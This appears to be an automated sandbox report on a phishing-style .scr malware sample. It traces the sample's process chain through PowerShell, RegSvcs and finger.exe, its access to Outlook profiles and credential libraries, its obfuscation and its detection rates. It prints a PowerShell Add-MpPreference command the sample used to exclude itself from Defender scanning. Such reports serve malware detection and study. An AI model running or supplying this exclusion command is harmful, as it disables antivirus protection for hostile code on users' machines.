File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\11v105ky.cvg.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n..........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(....... .......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................0..........................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................>..........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....S..........................s............(.......$.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................._..........................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................q..........................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................l.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior

Source: Payent confirmation copy 00888754087.scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payent confirmation copy 00888754087.scr

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Payent confirmation copy 00888754087.scr	Virustotal: Detection: 57%
Source: Payent confirmation copy 00888754087.scr	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr" /S
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Payent confirmation copy 00888754087.scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payent confirmation copy 00888754087.scr

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Payent confirmation copy 00888754087.scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source:	Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Payent confirmation copy 00888754087.scr, Form3.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	.Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.410000.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	.Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.2855d80.2.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Binary contains a suspicious time stamp

Source: Payent confirmation copy 00888754087.scr

Static PE information: 0x9C1061E0 [Fri Dec 20 14:55:28 2052 UTC]

PE file contains sections with non-standard names

Source: sqlite3.dll.6.dr	Static PE information: section name: /4
Source: sqlite3.dll.6.dr	Static PE information: section name: /19
Source: sqlite3.dll.6.dr	Static PE information: section name: /31
Source: sqlite3.dll.6.dr	Static PE information: section name: /45
Source: sqlite3.dll.6.dr	Static PE information: section name: /57
Source: sqlite3.dll.6.dr	Static PE information: section name: /70
Source: sqlite3.dll.6.dr	Static PE information: section name: /81
Source: sqlite3.dll.6.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0 push FFFFFF89h; retn D8D9h	3_2_00401A97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0 push ebx; retn F2A0h	3_2_00401B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042D963 push edi; iretd	3_2_0042D96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407109 push cs; iretd	3_2_0040710B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004149E2 push edi; retf	3_2_004149E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406365 push ebx; ret	3_2_00406366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00403370 push eax; ret	3_2_00403372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00417E8E push ebx; iretd	3_2_00417E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00414F55 push 00000079h; retf	3_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040D75B push ss; ret	3_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041870B pushad ; retf	3_2_0041870C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041AF95 push esi; iretd	3_2_0041AF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3DFA1 push ecx; ret	3_2_00A3DFB4

Source: Payent confirmation copy 00888754087.scr

Static PE information: section name: .text entropy: 7.80372244254093

Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, x85usGnCwJnBeo8rDc.cs	High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, rg35JuudNuuPPIfUtX.cs	High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, snYq7vjt6RoVqfKG38.cs	High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, mHDMjBXdZAhCJgRv98.cs	High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, APyjbyvbetLgTTfUX7.cs	High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, pNd39XzPNIQr9WNHMd.cs	High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, W3xqtbssSmfMGuTvJuC.cs	High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, efV8jdshvdLqdLIF0VS.cs	High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
